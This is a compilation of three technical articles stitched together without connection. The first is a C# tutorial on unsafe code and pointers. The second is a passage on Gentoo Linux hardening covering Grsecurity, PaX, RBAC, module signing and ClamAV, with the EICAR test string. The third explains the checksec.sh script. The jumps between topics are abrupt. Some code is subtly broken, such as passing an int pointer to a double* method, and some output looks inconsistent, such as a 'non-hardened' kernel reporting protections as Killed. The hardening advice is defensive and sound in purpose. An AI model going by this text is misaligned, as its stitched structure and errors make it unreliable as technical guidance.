In .NET, unsafe code really means potentially unsafe code: code or memory that exists outside the normal boundary. This article digs into the details of legacy C-style pointer implementation in the .NET framework, although we will seldom need to use pointer types. Unsafe code can access unmanaged memory resources, which are outside the realm of the CLR, through raw pointers, which are available only to unsafe code. Finally, using pointers is risky and error-prone, because we have to manually manage subtle memory-related tasks.

Unsafe Coding

In unsafe coding, developers can access raw legacy pointers in the .NET framework environment, using pointer operators such as & and *. Good programming practice says pointers should be avoided to make your code safer, because they interrupt the normal operation of the garbage collector and point to a fixed location in unmanaged memory, while reference types point to a movable location in managed memory. But the question arises: if pointers are so dangerous, why do we practice unsafe coding at all? Why does the .NET framework allow pointers? Unsafe coding is sometimes necessary: for example, porting C/C++ algorithms, which rely heavily on pointers, is much easier with them. There are certain circumstances in which unsafe coding is recommended, e.g.: calling an unmanaged function that requires a function pointer as a parameter. Unmanaged pointers no doubt improve performance and efficiency, and pointers might be easier and more convenient when working with binary and memory-resident data structures.

Safe Coding

Improper pointer management causes many common problems, including memory leaks, accessing invalid memory, and deleting bad pointers. Safe coding is limited to accessing the managed heap, which is managed by the garbage collector, an essential component of the common language runtime.
Code restricted to the managed heap is intrinsically safer than code that accesses unmanaged memory. The CLR automatically releases unused objects, conducts type verification, and performs other checks on managed memory. None of this is done automatically for unmanaged code; the developer is responsible for these tasks. With managed coding, the developer can focus on core application development instead of administrative tasks such as memory management.

Note: Code in an unmanaged section is considered unsafe and is not accessible to the CLR. Therefore, no code verification or stack tracing is performed on unmanaged code.

Pointers Implementation

Managed applications that include unsafe code must be compiled with the unsafe option. The C# compiler option is simply /unsafe. In the VS 2010 IDE, this option is found under the project properties, on the Build tab. You just have to check this option in order to compile unsafe code that uses pointers.

Note: Unsafe coding and pointer implementation require some background in C++ pointer manipulation.

The unsafe Keyword

The unsafe keyword specifies the location of unsafe code. When this keyword is applied to a type, all the members of that type are also considered unsafe, because code inside the target is considered unsafe.
When you wish to work with pointers in C#, you must specifically declare a block of unsafe code using the unsafe keyword. The following code segment depicts the overview of an unsafe code block:

class Program
{
    static void Main(string[] args)
    {
        // pointers won't work here
        unsafe
        {
            // pointer manipulation (&, *)
        }
    }
}

We can also mark classes, methods, structures, variables, and parameters with the unsafe keyword, like this:

public unsafe class test
{
    unsafe int x = 10;

    unsafe void myMethod(int* x)
    {
    }
}

The following sample does some math calculation by using a pointer and eventually produces a square root:

using System;

namespace unsafePro
{
    class Program
    {
        static void Main(string[] args)
        {
            unsafe
            {
                double x = 10;
                sqrt(&x);
            }
            Console.ReadKey();
        }

        unsafe static void sqrt(double* i)
        {
            Console.WriteLine("Square Root is={0}", Math.Sqrt(*i));
        }
    }
}

The important point to remember here is that an unsafe method must be called from an unsafe block, otherwise the compiler will issue an error. The following implementation produces a compile-time error because we are calling the sqrt method from outside the unsafe block:

static void Main(string[] args)
{
    unsafe
    {
        double x = 10;
        sqrt(&x);
    }
    int y = 5;
    sqrt(&y); // compile-time error
}

We can avoid the hassle of an unsafe block by putting the unsafe keyword prefix on the Main method:

unsafe static void Main(string[] args)
{
    double x = 10;
    sqrt(&x);
}

Pointer Declaration and Syntax

C# does not expose pointers automatically; exposing a pointer requires an unsafe context. Pointers are normally abstracted away by references in C#: a reference abstracts a pointer to memory on the managed heap, and the reference and related memory are managed by the GC. Here is the syntax for declaring a pointer:

unmanagedtype* identifier;

int* x, y;
int *x, *y; // wrong: syntax error

Here the asterisk symbol has two purposes: the first is to declare a new pointer variable and the second is to dereference a pointer.
The (->) Operator

Arrow notation (->) dereferences members of a pointer type found at a memory location. For instance, you can access members of a structure type using arrow notation and a pointer like this:

namespace unsafePro
{
    public struct xyz
    {
        public int x;
        public int y;
    }

    class Program
    {
        static void Main(string[] args)
        {
            unsafe
            {
                xyz obj = new xyz();
                xyz* aa = &obj;
                aa->x = 200;
                aa->y = 400;
                Console.WriteLine("X is={0}", aa->x);
                Console.WriteLine("Y is={0}", aa->y);
            }
            Console.ReadKey();
        }
    }
}

The sizeof Keyword

As in C++, the sizeof keyword is used to obtain the size in bytes of a value type, and it may only be used in an unsafe context.

static void Main(string[] args)
{
    unsafe
    {
        Console.WriteLine("Int size is={0}", sizeof(int));
        Console.WriteLine("Int16 size is={0}", sizeof(Int16));
        Console.WriteLine("Int32 size is={0}", sizeof(Int32));
        Console.WriteLine("Int64 size is={0}", sizeof(Int64));
    }
}

When compiled and run, this program prints the size of each integer type.

The stackalloc Keyword

In an unsafe context, we can declare a local variable that allocates memory directly from the call stack. To do so, C# provides the stackalloc keyword, which is the C# equivalent of the alloca function of the C runtime library.

unsafe static string data()
{
    char* buffer = stackalloc char[5];
    for (int i = 0; i < 5; i++)
    {
        buffer[i] = 'a';
    }
    // give an explicit length: the buffer is not null-terminated
    return new string(buffer, 0, 5);
}

Synopsis

The purpose of this article was to investigate one of the advanced concepts, pointer implementation, in the CLR context. We gained a solid understanding of unsafe and safe programming and learned how to implement pointers using C#.NET. Finally, we spent some time examining the small set of pointer-related keywords such as unsafe, sizeof, and stackalloc. Source
-
Grsecurity and Xorg

If we enable the "Disable privileged I/O" feature in the hardened kernel and reboot, we can't start the X server, because Xorg uses privileged I/O operations. We might receive an error like this:

# startx
xf86EnableIOPorts: failed to set IOPL for I/O (Operation not permitted)

If we would like to use Xorg, we must enable privileged I/O operations, which disables the "Disable privileged I/O" option in the hardened Linux kernel. But if we want to keep privileged I/O operations disabled and still use Xorg, we can apply a patch to the xorg-server, which can be obtained here. We can apply a custom patch in Gentoo by using the epatch_user function, which applies patches found in /etc/portage/patches/<category>/<package>[-<version>[-<revision>]] to the source code of the package [8].

# mkdir -p /etc/portage/patches/x11-base/xorg-server
# cd /etc/portage/patches/x11-base/xorg-server
# wget https://raw.github.com/N8Fear/hvb-overlay/master/x11-base/xorg-server/files/xorg-nohwaccess.patch
# emerge xorg-server

When we emerge xorg-server, the patch in /etc/portage/patches/x11-base/xorg-server will automatically be applied. Notice the line "Applying user patches from /etc/portage/patches//x11-base/xorg-server" below; the next lines say that xorg-nohwaccess.patch was applied, which is exactly the patch we downloaded from GitHub.

>>> Emerging (1 of 1) x11-base/xorg-server-1.13.4
 * xorg-server-1.13.4.tar.bz2 SHA256 SHA512 WHIRLPOOL size ;-) ... [ ok ]
>>> Unpacking source...
>>> Unpacking xorg-server-1.13.4.tar.bz2 to /var/tmp/portage/x11-base/xorg-server-1.13.4/work
>>> Source unpacked in /var/tmp/portage/x11-base/xorg-server-1.13.4/work
>>> Preparing source in /var/tmp/portage/x11-base/xorg-server-1.13.4/work/xorg-server-1.13.4 ...
 * Applying xorg-server-1.12-disable-acpi.patch ...
 * Applying xorg-server-1.13-ia64-asm.patch ...
 * Applying user patches from /etc/portage/patches//x11-base/xorg-server ...
 *   xorg-nohwaccess.patch ...
 * Done with patching

After the patch is applied, we can rebuild the kernel with the "Disable privileged I/O" option enabled, copy the newly built kernel to the /boot partition, and restart the system. Xorg should then start without problems.

PaX Internals

Once we've recompiled and rebooted into the new PaX-enabled kernel, it will automatically start using memory restrictions, ASLR, etc. Enabling PaX in the kernel is what we need to do to make the kernel (and therefore the system) more secure. But some executables, like Skype, won't work with those enforcements, because the security limitations are steep. If we'd like to run Skype, we need to configure the PaX restrictions in its ELF executable.

The first thing we need to do is enable the "CONFIG_PAX_XATTR_PAX_FLAGS" option in the kernel, rebuild the kernel, and reboot. That option instructs the kernel to read the PaX flags of the ELF binary when executing the program. This must be supported by the filesystem in use in order to work. The correct options in the Linux kernel are shown below.

Whenever we want to enable PaX, we need to choose between two modes:

SOFTMODE: The kernel doesn't enforce PaX protection by default for features which can be turned on or off at runtime.
Non-SOFTMODE: The kernel enforces PaX protections by default for all features.

We already mentioned that PaX supports the following features, which can be set to one of the presented values (summarized after [5]). The letters in the brackets represent the letter which can be used to control the corresponding feature on a per-executable or per-library basis. We can only enforce the settings for PAGEEXEC, SEGMEXEC, EMUTRAMP, MPROTECT and RANDMMAP on a per-object basis. The upper-case letters are used to enforce the setting in softmode, while the lower-case letters are used to relax the setting in non-softmode [5].
The bolded PaX protection features must be applied to ELF executables in order for them to be used, while the other features are applied at the kernel level.

Non-Executable Memory:
PAX_NOEXEC: Enforces all segments (except .text) of a program as non-executable when loaded in memory.
PAGEEXEC (p/P): The NX bit used by the hardware CPU to enforce the non-executable bit on memory pages.
SEGMEXEC (s/S): The NX bit used by the hardware CPU to enforce the non-executable bit on memory segments.
EMUTRAMP (e/E): Allows emulation of trampolines, even when the memory is marked as non-executable. This is normally used by self-modifying code, which is often used in viruses and worms, but can have legitimate purposes as well.
MPROTECT (m/M): Prevents changing memory access, creation of anonymous RWX memory, and making relro data pages writable.
KERNEXEC: Enforces PAGEEXEC and MPROTECT in the kernel space.

ASLR:
PAX_ASLR: Expands the number of randomized bits of the address space.
RANDMMAP (r/R): Enforces the use of a randomized base address.
RANDKSTACK: Enforces the use of a randomized stack address in every kernel process.
RANDUSTACK: Enforces the use of a randomized stack address in every user process.

Miscellaneous Memory Protections:
STACKLEAK: Deletes the kernel stack before the system call returns.
UDEREF: Prevents the kernel from dereferencing user-land pointers when kernel pointers are expected.
REFCOUNT: Prevents the kernel from overflowing reference counters.
USERCOPY: Makes the kernel enforce the size of heap objects when copied between user and kernel land.
SIZE_OVERFLOW: Makes the kernel recompute function arguments with double integer precision.
LATENT_ENTROPY: Makes the kernel generate extra entropy during system boot.

There are two ways of setting PaX enforcements on binary programs, which are presented below. We usually should choose one of the options; if both are enabled, the PaX flags should be the same for both.
By changing PaX flags, we're effectively enforcing or relaxing PaX restrictions on an ELF executable. That might be needed when the program uses memory in a way that isn't otherwise allowed.

PT_PAX: Keeps PaX flags in the ELF program header. That's useful because the flags are carried around with the binary program, but it introduces other kinds of problems, which is why it's better to use XATTR_PAX.
XATTR_PAX: Keeps PaX flags in the filesystem's extended attributes, which doesn't modify the ELF binary. The only requirement is that the filesystem in use supports xattrs.

PaX flags are enforced only on processes that were started from ELF executables. Such executables normally use shared libraries, which have their own PaX flags. The PaX flags of a process can be seen in the status file of each process in the /proc directory. Below, we've printed the PaX flags of the process with PID 11788.

# cat /proc/11788/status | grep PaX
PaX: PemRs

The PaX enforcement flags set on a process are those set on the program's ELF executable, not on one of its shared libraries. That's because a program normally links against multiple shared libraries, and there's no way to determine which shared library would take preference when setting PaX flags. Also, if the PaX flags of a chosen shared library were poorly set, that would affect the security of the whole system.

Let's install a few of the tools that we need when working with PaX-enabled executables. The command to install the most important packages regarding PaX is presented below:

# emerge app-misc/pax-utils sys-apps/paxctl app-admin/paxtest sys-apps/attr sys-apps/elfix

The paxctl tool can set only PT_PAX flags, while paxctl-ng can set both PT_PAX and XATTR_PAX flags. There's also a simple tool called migrate-pax, which copies the PT_PAX flags to XATTR_PAX for each program. We can also use the paxtest tool, which checks how the PaX settings affect our system by trying to attack it.
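A status line such as "PaX: PemRs" can be decoded mechanically. The following Python sketch is illustrative only; the letter-to-feature mapping follows the list earlier in the article, and the convention that an upper-case letter means the feature is active for the process (lower-case meaning inactive) is our assumption, worth verifying against the PaX documentation:

```python
# Letters used in the PaX status line (see the feature list above).
FEATURES = {
    "p": "PAGEEXEC",
    "s": "SEGMEXEC",
    "e": "EMUTRAMP",
    "m": "MPROTECT",
    "r": "RANDMMAP",
}

def decode_pax(status_line):
    """Decode a 'PaX: PemRs'-style line from /proc/<pid>/status.

    Assumption (verify against the PaX docs): upper-case means the
    feature is active for the process, lower-case means inactive.
    """
    flags = status_line.split(":", 1)[1].strip()
    return {FEATURES[ch.lower()]: ch.isupper() for ch in flags}

state = decode_pax("PaX: PemRs")
print(state)
```

For the example process above, this would report PAGEEXEC and RANDMMAP as active and the remaining three features as inactive.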
The tool runs a number of test cases, whose results are reported to the user. An example of running paxtest on a non-hardened kernel is presented below.

# paxtest kiddie
PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org>
Released under the GNU Public Licence version 2 or later

Writing output to paxtest.log
It may take a while for the tests to complete
Test results:
PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org>
Released under the GNU Public Licence version 2 or later

Mode: kiddie
Linux user 3.4.9-gentoo #9 SMP PREEMPT Sat Mar 9 11:52:45 CET 2013 x86_64 Intel(R) Core(TM)2 Duo CPU P8800 @ 2.66GHz GenuineIntel GNU/Linux

Executable anonymous mapping : Killed
Executable bss : Killed
Executable data : Killed
Executable heap : Killed
Executable stack : Killed
Executable shared library bss : Killed
Executable shared library data : Killed
Executable anonymous mapping (mprotect) : Vulnerable
Executable bss (mprotect) : Vulnerable
Executable data (mprotect) : Vulnerable
Executable heap (mprotect) : Vulnerable
Executable stack (mprotect) : Vulnerable
Executable shared library bss (mprotect) : Vulnerable
Executable shared library data (mprotect): Vulnerable
Writable text segments : Vulnerable
Anonymous mapping randomisation test : 28 bits (guessed)
Heap randomisation test (ET_EXEC) : 14 bits (guessed)
Heap randomisation test (PIE) : 28 bits (guessed)
Main executable randomisation (ET_EXEC) : No randomisation
Main executable randomisation (PIE) : 28 bits (guessed)
Shared library randomisation test : 28 bits (guessed)
Stack randomisation test (SEGMEXEC) : 28 bits (guessed)
Stack randomisation test (PAGEEXEC) : 28 bits (guessed)
Return to function (strcpy) : paxtest: return address contains a NULL byte.
Return to function (memcpy) : Vulnerable
Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte.
Return to function (memcpy, PIE) : Vulnerable

In the output above, there are various vulnerable test cases.
They’re fixed in the hardened kernel, as seen below.

# paxtest kiddie
PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org>
Released under the GNU Public Licence version 2 or later

Writing output to paxtest.log
It may take a while for the tests to complete
Test results:
PaXtest - Copyright(c) 2003,2004 by Peter Busser <peter@adamantix.org>
Released under the GNU Public Licence version 2 or later

Mode: kiddie
Linux user 3.10.1-hardened-r1 #10 SMP PREEMPT Mon Sep 30 18:29:13 CEST 2013 x86_64 Intel(R) Core(TM)2 Duo CPU P8800 @ 2.66GHz GenuineIntel GNU/Linux

Executable anonymous mapping : Killed
Executable bss : Killed
Executable data : Killed
Executable heap : Killed
Executable stack : Killed
Executable shared library bss : Killed
Executable shared library data : Killed
Executable anonymous mapping (mprotect) : Killed
Executable bss (mprotect) : Killed
Executable data (mprotect) : Killed
Executable heap (mprotect) : Killed
Executable stack (mprotect) : Killed
Executable shared library bss (mprotect) : Killed
Executable shared library data (mprotect): Killed
Writable text segments : Killed
Anonymous mapping randomisation test : 29 bits (guessed)
Heap randomisation test (ET_EXEC) : 23 bits (guessed)
Heap randomisation test (PIE) : 35 bits (guessed)
Main executable randomisation (ET_EXEC) : No randomisation
Main executable randomisation (PIE) : 27 bits (guessed)
Shared library randomisation test : 29 bits (guessed)
Stack randomisation test (SEGMEXEC) : 35 bits (guessed)
Stack randomisation test (PAGEEXEC) : 35 bits (guessed)
Return to function (strcpy) : paxtest: return address contains a NULL byte.
Return to function (memcpy) : Vulnerable
Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte.
Return to function (memcpy, PIE) : Vulnerable

RBAC

RBAC operates with roles, which define the operations that can be done on objects on the system.
To ensure that users are only allowed to perform certain operations, each user must be assigned an RBAC role. RBAC is therefore used whenever we would like to restrict access to resources to authorized users. While Grsecurity and PaX are used to prevent attackers from gaining code execution on the system, RBAC exists to prevent authorized users from doing something they shouldn't be doing.

If we'd like to use RBAC, we first need to enable it in the kernel. We've described the "Role Based Access Control Options", which are used to specify the kernel options used in RBAC. Those kernel options can be seen below.

When we choose to enable the RBAC system, we should install the gradm program, which serves as an administrative interface to the RBAC system. After installing the gradm package, we should set the administrator password (with the -P option) and enable the Grsecurity RBAC system (with the -E option). We can disable it with the -D option.

# gradm -P
Setting up grsecurity RBAC password
Password:
Re-enter Password:
Password written to /etc/grsec/pw.
# gradm -E

After enabling RBAC, we can configure the system-wide rules through the /etc/grsec/policy file. To ease the configuration of the policy file, the gradm command has the --learn argument, which we can use to build policy files automatically, by learning. The /etc/grsec/policy file consists of three types of entries:

Roles: users and groups on the system
Subjects: processes and directories
Objects: files and PaX flags

For example, RBAC can be used to restrict access to ssh: rules can be put in place to prevent some users from sshing into the box while still allowing them to use scp to transfer files between systems. One really important example of using RBAC controls is when a root-owned binary has the SUID/SGID bits set. In that case, any user who runs the executable runs it in the context of the root user.
To prevent that, we can enable appropriate RBAC rules, which will give only certain users access to that executable.

Signed Kernel Modules

When an attacker gains access to our computer, he or she can load a kernel module into the kernel to get a permanent backdoor into the system; that usually happens with rootkits. This problem can be prevented by digitally signing kernel modules, which is supported since kernel version 3.7. The option can be found under “Enable loadable module support” and can be seen in the picture below as “Module signature verification”. If we’d like to enable the verification of kernel module signatures, we need to enable the following options:

Require modules to be validly signed: when this option is enabled, all kernel modules need to be signed, otherwise they won’t be allowed to load into the kernel.
Automatically sign all modules: this option needs to be enabled if we’d like to sign all kernel modules when compiling the kernel.
Which hash algorithm should modules be signed with: this option specifies the algorithm used to sign the modules. We can choose between SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512.

When those options are enabled and we run “make && make modules && make modules_install,” the modules will be signed with a dynamically generated key, which is saved in the root of the kernel source tree as signing_key.priv and signing_key.x509. If we’d like to use our own certificates, we need to create them with the openssl command and replace the signing_key.priv and signing_key.x509 keys. Remember that after we’ve built the kernel, we should move the private key signing_key.priv to a secure location: if we keep it in the /usr/src/linux/ directory, an attacker can use it to sign his or her own modules, which can then be inserted into the kernel.

ClamAV in Realtime

If we’d like to harden our system against malicious files downloaded from the internet, we should use the ClamAV anti-virus software.
First, we have to install the required packages, which we can do with the command below:

# emerge app-antivirus/clamav app-antivirus/clamav-unofficial-sigs app-antivirus/clamtk net-proxy/squidclamav sys-fs/clamfs sys-fs/avfs

Then, we need to update the virus database with the freshclam command, which downloads main.cvd, daily.cvd and bytecode.cvd; these contain the signatures used in virus detection. Next, we should download the EICAR test virus from the official website onto our disk: the versions saved as .com and .txt files, as well as the ones embedded in a single and a double zip archive.

# wget http://www.eicar.org/download/eicar.com
# wget http://www.eicar.org/download/eicar.com.txt
# wget http://www.eicar.org/download/eicar_com.zip
# wget http://www.eicar.org/download/eicarcom2.zip
# cat eicar.com
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

After that, we can scan the directory for malicious files with the clamscan command.

# clamscan .
./eicar.com: Eicar-Test-Signature FOUND
./eicar_com.zip: Eicar-Test-Signature FOUND
./eicarcom2.zip: Eicar-Test-Signature FOUND
./eicar.com.txt: Eicar-Test-Signature FOUND

----------- SCAN SUMMARY -----------
Known viruses: 2820461
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 4
Infected files: 4
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 5.975 sec (0 m 5 s)

But we don’t want to run clamscan by hand every time we download a file from the internet: that would quickly become tiresome and we’d probably stop doing it, which completely defeats the purpose. Instead, we can run the clamd daemon and scan the directory with the clamdscan command. But how is that better than before? We still need to run a command-line program to actually scan the file.
A good thing about the ClamAV daemon is that all programs on the system can use it to scan files for viruses.

# /etc/init.d/clamd start
# rc-update add clamd default
# clamdscan .
./eicar_com.zip: Eicar-Test-Signature FOUND
./eicar.com: Eicar-Test-Signature FOUND
./eicarcom2.zip: Eicar-Test-Signature FOUND
./eicar.com.txt: Eicar-Test-Signature FOUND

----------- SCAN SUMMARY -----------
Infected files: 4
Time: 0.002 sec (0 m 0 s)

We still need to solve the problem of automatically scanning files once they’re downloaded. One solution is ClamFS, a user-space filesystem that scans every file on the mounted filesystem when we try to access it. The files aren’t necessarily scanned the moment they are downloaded from the internet, but when they are accessed by the user. Nevertheless, this is just as secure, because for most attack vectors to be triggered, the user needs to open the file first. The second option is Avfs, which is quite similar to ClamFS, except that it can also quarantine and isolate infected files, so they never touch the disk and user processes can’t access them.

ClamFS

After installing clamfs, we need to edit the /etc/clamfs/clamfs.xml file to fit our needs. In the XML configuration file, we need to provide the following:

Clamd socket: the path to the socket used by clamd.
Filesystem root: the root directory where we save the files to be scanned by the ClamAV anti-virus. Remember that we shouldn’t open the files saved in this directory.
Filesystem mountpoint: a copy of the root directory, where the files are automatically scanned for viruses when opened.
Maximum file size: the maximum file size that will be scanned by ClamAV; files larger than that won’t be scanned for viruses.
Whitelisted files: the <whitelist> section specifies the file extensions that will never be scanned for viruses, because scanning them is deemed unnecessary.
That’s usually applied to file extensions such as .avi or .mp3. Keep in mind, though, that although such files aren’t executable, they can nevertheless contain malicious shellcode that can be executed if a buffer overflow is present in the program opening them.
Blacklisted files: the <blacklist> section specifies the file extensions that will always be scanned, regardless of their size.
Logging method: we can use the stdout, syslog or file logging method if we want to log the ClamAV scanning results somewhere; we’re particularly interested in the results when malicious code is detected.
Send mail: we can configure clamfs to send us an email when malicious code is found, which helps us detect a threat as soon as possible.

After we’ve configured clamfs, we need to start it and add it to the default runlevel, so it starts at boot time.

# /etc/init.d/clamfs start
# rc-update add clamfs default

Then, we can copy the previously downloaded EICAR viruses into the configured root directory; that’s where files to be scanned should be copied. After copying a file into the root directory, the same file is available in the root as well as in the mountpoint location.

# cp rootdir/eicar.com.txt mountdir/

Remember that we should open files from the mountpoint location if we’d like them to be scanned by ClamAV upon access. The picture below shows the eicar.com.txt file opened from the root directory: the EICAR virus is there and wasn’t blocked, because we’ve opened the file from the wrong directory. But if we open the same eicar.com.txt file from the mountpoint directory, the EICAR virus isn’t there anymore, because it was removed: the moment we accessed eicar.com.txt, it was scanned by the ClamAV anti-virus scanner. That can be verified through the logging options, where a message about scanning and detecting a virus is appended to the logfile.
That can be seen below, where the process starts to scan the eicar.com.txt file by connecting to the clamd daemon and detects the Eicar-Test-Signature.

00:33:33 (clamfs.cxx:590) Extension not found in unordered_map
00:33:33 (clamfs.cxx:675) early cache miss for inode 68137890
00:33:33 (clamav.cxx:101) attempt to scan file /home/user/rootdir/eicar.com.txt
00:33:33 (clamav.cxx:111) started scanning file /home/user/rootdir/eicar.com.txt
00:33:33 (clamav.cxx:58) attempt to open control connection to clamd via /var/run/clamav/clamd.sock
00:33:33 (clamav.cxx:63) connected to clamd
00:33:33 (clamav.cxx:88) closing clamd connection
00:33:33 (clamav.cxx:126) /home/user/rootdir/eicar.com.txt: Eicar-Test-Signature FOUND
00:33:33 (clamav.cxx:138) (gvim:23343) (eleanor:1000) /home/user/rootdir/eicar.com.txt: Eicar-Test-Signature FOUND

Conclusion

In this article, we’ve presented various techniques that we can use to harden the security of a Linux system. It’s also useful to have a checklist where we can mark (Y/N) whether each security enhancement has been applied to our system; that way we don’t forget anything important when securing a system. Note that the table was summarized after [12].

Physical Security: If the computer is in a room that is physically accessible to multiple people, is the machine properly secured so an attacker cannot gain access to the hard drives?

Services: Upon installing the Linux operating system, have all the services that aren’t needed been disabled, to remove possible entry points for an attacker? We should also take a look at the enabled services and harden them one by one, since each of them has specific configuration variables we need to pay attention to.

Separate Partitions: Are the partitions the user can write to, like /home, /tmp and /var/tmp, on separate partitions, and do they use disk quotas?
The partitions the user can write to must have user quotas, to prevent a user from filling up the whole disk.

Root user: Is access to the root user properly hardened? Only predefined users should be in the wheel group, which allows users to su to root. The usage of sudo should also be properly restricted.

USE Flags: Certain USE flags that harden the security of the whole system need to be enabled. Those flags are pam, tcpd and ssl.

Grub password: Does Grub have a password? That should prevent attackers from booting into single user mode.

Hardening /etc/securetty: The /etc/securetty file specifies the terminals root is allowed to log into. We should only enable the tty1 terminal, so that root can log in on only one terminal.

Logging: We need to ensure that we enable a remote logging server where the logs from our machine are sent. This allows the logs to be evaluated for possible malicious activity, but more importantly provides evidence when a security breach occurs.

Mounting Partitions: When mounting partitions from /etc/fstab, we need to set the following flags on the appropriate mount points: nosuid, noexec and nodev. The nosuid flag ignores the SUID bit of executables, noexec prevents any executable from being executed from the chosen partition, and nodev ignores device files on that partition.

World readable and writable files: We must ensure that files which contain passwords or other critical information are not universally readable, let alone writable. Otherwise, an attacker can simply read the file and get the password, or even worse, change the whole file completely.

SUID/SGID files: When an executable has the SUID/SGID bit set, it executes with root privileges no matter which user runs it. This is why we must limit the number of such executables, to reduce the attack surface. Remember that you shouldn’t remove the SUID bit from the su executable, otherwise you won’t be able to su to root anymore.
PAM: PAM takes care of the authentication details of users; we can also use it to set various password hardening options when choosing a password. For example, we might require that the minimum length of a password be at least eight characters. In Gentoo, this can be ensured by installing the cracklib package.

Grsecurity/PaX: We should install and configure a Grsecurity/PaX enabled kernel, which provides a hardened Linux security system that we simply must have to win the battle against blackhats.

Firewall and IDS/IPS: We should enable a firewall on our machine, so we can restrict access to certain IP ranges and block certain IP addresses, for example in response to a detected SYN flood or another attack. An IDS can detect various kinds of attacks executed against our machine, while an IPS can also prevent them.

Patching the system: We need to ensure that we don’t run out-of-date services on our machine, since they can contain vulnerabilities that an attacker can use to gain access to our machine. This is one of the most important things to remember when trying to keep systems secure: update your systems regularly.

References:

[1] Hardened Gentoo, http://www.gentoo.org/proj/en/hardened/.
[2] Security-Enhanced Linux, Wikipedia, the free encyclopedia.
[3] RSBAC, Wikipedia, the free encyclopedia.
[4] Hardened/Toolchain, https://wiki.gentoo.org/wiki/Hardened/Toolchain#RELRO.
[5] Hardened/PaX Quickstart, https://wiki.gentoo.org/wiki/Project:Hardened/PaX_Quickstart.
[6] checksec.sh, trapkit.de.
[7] KERNHEAP, http://subreption.com/products/kernheap/.
[8] Advanced Portage Features, http://www.gentoo.org/doc/en/handbook/handbook-amd64.xml?part=3&chap=6.
[9] Elfix Homepage, elfix.
[10] Avfs: An On-Access Anti-Virus File System.
[11] EICAR Download, EICAR - European Expert Group for IT-Security.
[12] Gentoo Security Handbook, Gentoo Linux Documentation.

Source
-
Checksec

The checksec.sh file is a Bash script used to verify which PaX security features are enabled. The latest version can be downloaded with the wget command:

# wget http://www.trapkit.de/tools/checksec.sh
# chmod +x checksec.sh
# ./checksec.sh --version
checksec v1.5, Tobias Klein, www.trapkit.de, November 2011

Let’s take a look at how checksec.sh does what it does. First, let’s run it without any arguments, which prints its help page as shown below.

# ./checksec.sh
Usage: checksec [OPTION]

Options:

  --file <executable-file>
  --dir <directory> [-v]
  --proc
  --proc-all
  --proc-libs
  --kernel
  --fortify-file <executable-file>
  --fortify-proc
  --version
  --help

For more information, see:
  http://www.trapkit.de/tools/checksec.html

The checksec.sh script can check whether ELF executables and running processes support the following security mitigations:

RELRO
Stack canary
NoeXecute (NX)
Position Independent Executable (PIE)
Address Space Layout Randomization (ASLR)
Fortify Source

The --file option can be used to check which security mitigations are enabled for a file, whereas --dir checks all files in a given directory. The --proc option checks a certain process, --proc-all checks all currently running processes, and --proc-libs checks a process’s libraries. Let’s see how the /bin/bash program was compiled:

# ./checksec.sh --file /bin/bash
RELRO           STACK CANARY      NX            PIE      RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE   No RPATH   No RUNPATH   /bin/bash

Let’s see how the checksec.sh script checks for RELRO support. In the graphic below, we can see that it uses the readelf command to check whether one of the file’s program headers is GNU_RELRO. When RELRO is enabled, it only needs to determine whether full or partial RELRO is supported. To check for the stack canary, the -s option of readelf is used to check whether one of the symbol table entries is __stack_chk_fail.
When that symbol is present, the stack canary is enabled; otherwise it’s not. NoeXecute is checked by using the -l option of readelf: if NX is disabled, the RWE string is present in the same line as the GNU_STACK segment header. PIE support is determined by using the -h option of readelf, which prints the ELF header: if the ELF header type contains the string ‘EXEC’, PIE is disabled, but if it contains ‘DYN’, PIE is enabled. The rpath and runpath are determined by checking whether one of the dynamic sections is named RPATH or RUNPATH, as shown below.

There are also the --fortify-file and --fortify-proc arguments, which check whether a binary file or process has been compiled with FORTIFY_SOURCE support. FORTIFY_SOURCE is a security mitigation that can detect and prevent certain buffer overflows. When a function operates on a buffer of known size and we pass it an overly long argument, the check can detect this, because it knows the size of the buffer the function operates on. This works when the compiler can determine the size of the buffer at compile time and substitute checked versions of dangerous functions, like strcpy, that copy at most the buffer’s size without overflowing it.

Let’s use --fortify-proc on PID 3323 to check which functions support FORTIFY_SOURCE. The output can be seen below.

# ./checksec.sh --fortify-proc 3323
* Process name (PID) : bash (3323)
* FORTIFY_SOURCE support available (libc) : Yes
* Binary compiled with FORTIFY_SOURCE support: Yes

------ EXECUTABLE-FILE -------
-------- LIBC --------
FORTIFY-able library functions | Checked function names
-------------------------------------------------------
gethostname                    | __gethostname_chk
printf_chk                     | __printf_chk
longjmp_chk                    | __longjmp_chk
wctomb                         | __wctomb_chk
readlink                       | __readlink_chk
fdelt_chk                      | __fdelt_chk
read                           | __read_chk
confstr                        | __confstr_chk
getcwd                         | __getcwd_chk
fprintf_chk                    | __fprintf_chk
mbstowcs                       | __mbstowcs_chk
memmove_chk                    | __memmove_chk
memmove                        | __memmove_chk
vsnprintf_chk                  | __vsnprintf_chk
fgets                          | __fgets_chk
strncpy                        | __strncpy_chk
strncpy_chk                    | __strncpy_chk
mbsrtowcs                      | __mbsrtowcs_chk
getgroups                      | __getgroups_chk
snprintf_chk                   | __snprintf_chk
memset                         | __memset_chk
memcpy_chk                     | __memcpy_chk
memcpy                         | __memcpy_chk
mbsnrtowcs                     | __mbsnrtowcs_chk
vfprintf_chk                   | __vfprintf_chk
wcrtomb                        | __wcrtomb_chk
strcpy                         | __strcpy_chk
strcpy_chk                     | __strcpy_chk
sprintf_chk                    | __sprintf_chk
wcsrtombs                      | __wcsrtombs_chk
strcat                         | __strcat_chk
asprintf_chk                   | __asprintf_chk

SUMMARY:

* Number of checked functions in libc                : 76
* Total number of library functions in the executable: 1684
* Number of FORTIFY-able functions in the executable : 32
* Number of checked functions in the executable      : 13
* Number of unchecked functions in the executable    : 19

